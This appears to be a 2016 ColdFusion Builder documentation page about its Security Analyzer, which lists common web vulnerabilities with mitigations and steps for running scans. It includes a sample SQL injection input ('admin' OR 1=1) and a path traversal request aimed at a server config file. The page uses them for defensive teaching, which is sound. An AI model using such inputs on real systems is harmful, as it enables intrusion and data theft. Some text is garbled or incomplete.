25 February 2016
The Security analyzer scans through your ColdFusion code and flags potential security flaws in the code.
Here is a list of the top security vulnerabilities that the Security Analyzer catches:
Hackers use SQL Injection widely. In SQL Injection, you can log in, get user details, know tables names, drop tables, and so on.
For example, if a vulnerable website accepts the password " 'admin' OR 1=1", a hacker can invade the system by executing the following SQL:
Select * from users where user = #URL.userid# and password = 'somepasword will be interpreted as
Select * from users where user = 'admin' OR 1=1 and password = 'somepasword'
In ColdFusion, we recommend using cfqueryparam for such scenarios.
Cross-site scripting (XSS) attacks are also widely used security vulnerability. XSS can be persistent or non-persistent. Using XSS, a hacker can perform the following:
Avoid using untrusted inputs in file operations.
User Requests --> ?header=../../server-config.txt
The code should always validate the file paths.
Validate the file path for cffile, cfdirectory, and their corresponding functions.
In ColdFusion we recommend using various encoding functions before sending any variable as output.
The cfhtmltopdf tag introduced in ColdFusion 11 provides powerful HTML rendering, powered by WebKit to produce PDF files. Since HTML is rendered by the server, exercise caution when using variables in the PDF document.
Cross Site Request Forgeries (CSRF) vulnerabilities occur when an attacker tricks an authenticated user into clicking a URL, or embeds a URL in a page that is requested by an authenticated browser.
In ColdFusion, we recommend using a combination of CSRFGenerateToken and CSRYVerifyToken to avoid this attack.
Validate the file path and file type. The ‘accept’ attribute is not reliable as the mime type can be changed. Use the ‘strict’ attribute.
Use the functions IsImageFile, IsPDFFile, IsSpreadsheetFile, and FileGetMimeType to upload files.
If a cookie contains sensitive information (for example, session identifiers), send the cookie over a secure transport mechanism. Enable the secure attribute.
GET is less secure than POST because data sent is part of the URL. Do not use GET when sending passwords or other sensitive information! For example, anyone can bookmark GET requests and later view any sensitive information present in it.
If you pass CFID and CFToken as URL parameters, there can be a security risk. Make Addtoken as false.
It is recommended that you avoid creating unnamed applications.
To run Security Analyzer from ColdFusion Builder (2016 release):
Enable RDS to run this tool.
Right click on any folder or file which you want to scan and the click Run Security Analyzer.
Once the scan is over, you can see a notification.
The pane at the bottom lists all the errors found by the scan. It is categorized according to the vulnerability types. You can also further drill down to errors or warnings level. The section on the right suggests the solution for the particular vulnerability.
Click any error to go to the exact location in the corresponding cfm file.
To export the error report, click Export.
The report is in a graphical format. A sample is shown below: